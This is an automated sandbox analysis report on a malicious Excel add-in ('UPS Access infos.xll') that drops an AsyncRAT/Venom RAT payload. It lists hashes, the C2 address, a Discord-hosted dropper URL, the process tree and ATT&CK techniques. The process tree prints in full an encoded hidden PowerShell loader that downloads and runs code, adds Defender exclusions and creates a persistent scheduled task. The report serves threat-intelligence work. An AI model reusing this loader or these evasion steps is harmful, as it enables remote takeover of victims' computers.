Analysis

  • max time kernel
    101s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    01-07-2022 12:57

General

  • Target

    UPS Access infos.xll

  • Size

    2.0MB

  • MD5

    df7e8add740fcae0d645eb8f66e085f4

  • SHA1

    f5fd645f5596028a550c1e3351f3e097b33ddc17

  • SHA256

    d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

  • SHA512

    65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://cdn.discordapp.com/attachments/982077202424279072/992061153092063242/Librarieszip

Extracted

Language
xlm4.0
Source

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

expresschiatto.freeddns.org:4449

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\UPS Access infos.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4576
    • C:\Users\Admin\AppData\Roaming\nice.exe
      "C:\Users\Admin\AppData\Roaming\nice.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cmd.exe /C ping 1.1.1.1 -n 4 > Nul & powershell -WindowStyle Hidden -Encoded JABhADEAIAA9ACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABpAG4AcwB0AGEAbABsAC4AdABlAG0AcAAuAGwAbwBnACcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADkAOAAyADAANwA3ADIAMAAyADQAMgA0ADIANwA5ADAANwAyAC8AOQA5ADIAMAA2ADAANAAwADgAOQA4ADgAOQA3ADEAMAA3ADgALwBjAC4ANgA0ACcAIAAtAE8AdQB0AGYAaQBsAGUAIAAkAGEAMQA7ACQAdwBvAHIAbABkACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYQAxADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdwBvAHIAbABkACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAUwBwAHIAZQBhAGQAcwBoAGUAZQB0AE0AYQBuAGEAZwBlAHIALgBlAHgAZQAiADsAJABmACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAGIAcwAuAHoAaQBwACcAOwBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgAgAC0AUABhAHQAaABUAHkAIABMAGUAYQBmACkAKQB7ACAAdAByAHkAIAB7ACQAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBhAEgAUgAwAGMASABNADYATAB5ADkAagBaAEcANAB1AFoARwBsAHoAWQAyADkAeQBaAEcARgB3AGMAQwA1AGoAYgAyADAAdgBZAFgAUgAwAFkAVwBOAG8AYgBXAFYAdQBkAEgATQB2AE8AVABnAHkATQBEAGMAMwBNAGoAQQB5AE4ARABJADAATQBqAGMANQBNAEQAYwB5AEwAegBrADUATQBqAEEAMgBNAFQARQAxAE0AegBBADUATQBqAEEAMgBNAHoASQAwAE0AaQA5AE0AYQBXAEoAeQBZAFgASgBwAFoAWABOADYAYQBYAEEAPQAnACkAKQA7ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABzACAALQBPAHUAdABmAGkAbABlACAAJABmADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABmACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACcAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGYAfQBjAGEAdABjAGgAewB9AH0AZQBsAHMAZQB7AH0AOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdAAgAE0AYQBuAGEAZwBlAHIAIABVAHQAaQBsAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAgAC8AcgBsACAASABJAEcASABFAFMAVAAgAC8AdAByACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABTAHAAcgBlAGEAZABzAGgAZQBlAHQATQBhAG4AYQBnAGUAcgAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGEAMQA7AA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Windows\system32\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 4
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2088
          • C:\Windows\system32\PING.EXE
            ping 1.1.1.1 -n 4
            5⤵
            • Runs ping.exe
            PID:572
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -Encoded JABhADEAIAA9ACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABpAG4AcwB0AGEAbABsAC4AdABlAG0AcAAuAGwAbwBnACcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADkAOAAyADAANwA3ADIAMAAyADQAMgA0ADIANwA5ADAANwAyAC8AOQA5ADIAMAA2ADAANAAwADgAOQA4ADgAOQA3ADEAMAA3ADgALwBjAC4ANgA0ACcAIAAtAE8AdQB0AGYAaQBsAGUAIAAkAGEAMQA7ACQAdwBvAHIAbABkACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYQAxADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdwBvAHIAbABkACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIALAAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAUwBwAHIAZQBhAGQAcwBoAGUAZQB0AE0AYQBuAGEAZwBlAHIALgBlAHgAZQAiADsAJABmACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAGIAcwAuAHoAaQBwACcAOwBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgAgAC0AUABhAHQAaABUAHkAIABMAGUAYQBmACkAKQB7ACAAdAByAHkAIAB7ACQAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBhAEgAUgAwAGMASABNADYATAB5ADkAagBaAEcANAB1AFoARwBsAHoAWQAyADkAeQBaAEcARgB3AGMAQwA1AGoAYgAyADAAdgBZAFgAUgAwAFkAVwBOAG8AYgBXAFYAdQBkAEgATQB2AE8AVABnAHkATQBEAGMAMwBNAGoAQQB5AE4ARABJADAATQBqAGMANQBNAEQAYwB5AEwAegBrADUATQBqAEEAMgBNAFQARQAxAE0AegBBADUATQBqAEEAMgBNAHoASQAwAE0AaQA5AE0AYQBXAEoAeQBZAFgASgBwAFoAWABOADYAYQBYAEEAPQAnACkAKQA7ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABzACAALQBPAHUAdABmAGkAbABlACAAJABmADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABmACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACcAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGYAfQBjAGEAdABjAGgAewB9AH0AZQBsAHMAZQB7AH0AOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdABNAGEAbgBhAGcAZQByAC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhACIAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFMAcAByAGUAYQBkAHMAaABlAGUAdAAgAE0AYQBuAGEAZwBlAHIAIABVAHQAaQBsAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAgAC8AcgBsACAASABJAEcASABFAFMAVAAgAC8AdAByACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABTAHAAcgBlAGEAZABzAGgAZQBlAHQATQBhAG4AYQBnAGUAcgAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGEAMQA7AA==
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:752
          • C:\ProgramData\SpreadsheetManager.exe
            "C:\ProgramData\SpreadsheetManager.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1096
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:780
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /F /tn "Spreadsheet Manager Utility Update" /rl HIGHEST /tr C:\ProgramData\SpreadsheetManager.exe
            5⤵
            • Creates scheduled task(s)
            PID:2084

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\SpreadsheetManager.exe
    Filesize

    381KB

    MD5

    c1dc5704c9bf143276bedd4c3e2b601d

    SHA1

    0f637d066eeae31e664456c939c70e4437d36781

    SHA256

    539bd579b4269c190d5ff2ac4eb9ccf8a452291054ad5b60204267985a1a13c7

    SHA512

    602330edd872451d6a222b2492d060fc229c50cce5991cfd102e50f189a51e2c27d09150bc96954c6c07dd88e8a94b14316b15e8e38cf54d68996cb038302110

  • C:\ProgramData\SpreadsheetManager.exe
    Filesize

    381KB

    MD5

    c1dc5704c9bf143276bedd4c3e2b601d

    SHA1

    0f637d066eeae31e664456c939c70e4437d36781

    SHA256

    539bd579b4269c190d5ff2ac4eb9ccf8a452291054ad5b60204267985a1a13c7

    SHA512

    602330edd872451d6a222b2492d060fc229c50cce5991cfd102e50f189a51e2c27d09150bc96954c6c07dd88e8a94b14316b15e8e38cf54d68996cb038302110

  • C:\Users\Admin\AppData\Local\Temp\UPS Access infos.xll
    Filesize

    2.0MB

    MD5

    df7e8add740fcae0d645eb8f66e085f4

    SHA1

    f5fd645f5596028a550c1e3351f3e097b33ddc17

    SHA256

    d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

    SHA512

    65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

  • C:\Users\Admin\AppData\Local\Temp\UPS Access infos.xll
    Filesize

    2.0MB

    MD5

    df7e8add740fcae0d645eb8f66e085f4

    SHA1

    f5fd645f5596028a550c1e3351f3e097b33ddc17

    SHA256

    d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

    SHA512

    65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

  • C:\Users\Admin\AppData\Roaming\nice.exe
    Filesize

    427KB

    MD5

    9b38ad9554c2364a3e81c66edfdaaa04

    SHA1

    c33ea06c3cd25c6c80ff923d81853d0e31bd002f

    SHA256

    e07afa746786483bb2e783640980daa167b9de1505c894e5633bf05994abd7af

    SHA512

    6cbbe75afdb9f9e50c4fce26ef33958a5e6652eeb096645663739c3c634ceb5fadb3e01d33bc9111af577cfcb0d34467f485e55bfa67fa40a0d8e4c9bc1f3b74

  • C:\Users\Admin\AppData\Roaming\nice.exe
    Filesize

    427KB

    MD5

    9b38ad9554c2364a3e81c66edfdaaa04

    SHA1

    c33ea06c3cd25c6c80ff923d81853d0e31bd002f

    SHA256

    e07afa746786483bb2e783640980daa167b9de1505c894e5633bf05994abd7af

    SHA512

    6cbbe75afdb9f9e50c4fce26ef33958a5e6652eeb096645663739c3c634ceb5fadb3e01d33bc9111af577cfcb0d34467f485e55bfa67fa40a0d8e4c9bc1f3b74

  • memory/572-148-0x0000000000000000-mapping.dmp
  • memory/752-149-0x0000000000000000-mapping.dmp
  • memory/752-153-0x0000019B9D2A0000-0x0000019B9D2B2000-memory.dmp
    Filesize

    72KB

  • memory/752-152-0x00007FF8AF9F0000-0x00007FF8B04B1000-memory.dmp
    Filesize

    10.8MB

  • memory/752-150-0x0000019B9CF00000-0x0000019B9CF22000-memory.dmp
    Filesize

    136KB

  • memory/752-159-0x00007FF8AF9F0000-0x00007FF8B04B1000-memory.dmp
    Filesize

    10.8MB

  • memory/752-154-0x0000019B9D290000-0x0000019B9D29A000-memory.dmp
    Filesize

    40KB

  • memory/780-165-0x0000000000000000-mapping.dmp
  • memory/780-166-0x0000000000400000-0x0000000000416000-memory.dmp
    Filesize

    88KB

  • memory/780-167-0x0000000005750000-0x00000000057B6000-memory.dmp
    Filesize

    408KB

  • memory/1096-164-0x0000000009010000-0x000000000901A000-memory.dmp
    Filesize

    40KB

  • memory/1096-155-0x0000000000000000-mapping.dmp
  • memory/1096-163-0x0000000005250000-0x00000000052EC000-memory.dmp
    Filesize

    624KB

  • memory/1096-160-0x0000000000860000-0x00000000008C6000-memory.dmp
    Filesize

    408KB

  • memory/1096-161-0x0000000005680000-0x0000000005C24000-memory.dmp
    Filesize

    5.6MB

  • memory/1096-162-0x00000000051B0000-0x0000000005242000-memory.dmp
    Filesize

    584KB

  • memory/2084-157-0x0000000000000000-mapping.dmp
  • memory/2088-147-0x0000000000000000-mapping.dmp
  • memory/4540-146-0x0000000000000000-mapping.dmp
  • memory/4576-141-0x00007FF8AF9F0000-0x00007FF8B04B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4576-133-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-144-0x000001B6D973C000-0x000001B6D973F000-memory.dmp
    Filesize

    12KB

  • memory/4576-174-0x00007FF8AF9F0000-0x00007FF8B04B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4576-130-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-138-0x000001B6D93B0000-0x000001B6D95D2000-memory.dmp
    Filesize

    2.1MB

  • memory/4576-136-0x00007FF895D30000-0x00007FF895D40000-memory.dmp
    Filesize

    64KB

  • memory/4576-135-0x00007FF895D30000-0x00007FF895D40000-memory.dmp
    Filesize

    64KB

  • memory/4576-134-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-151-0x00007FF8AF9F0000-0x00007FF8B04B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4576-132-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-131-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-169-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-170-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-171-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-172-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
    Filesize

    64KB

  • memory/4576-173-0x000001B6D973C000-0x000001B6D973F000-memory.dmp
    Filesize

    12KB

  • memory/5116-142-0x0000000000000000-mapping.dmp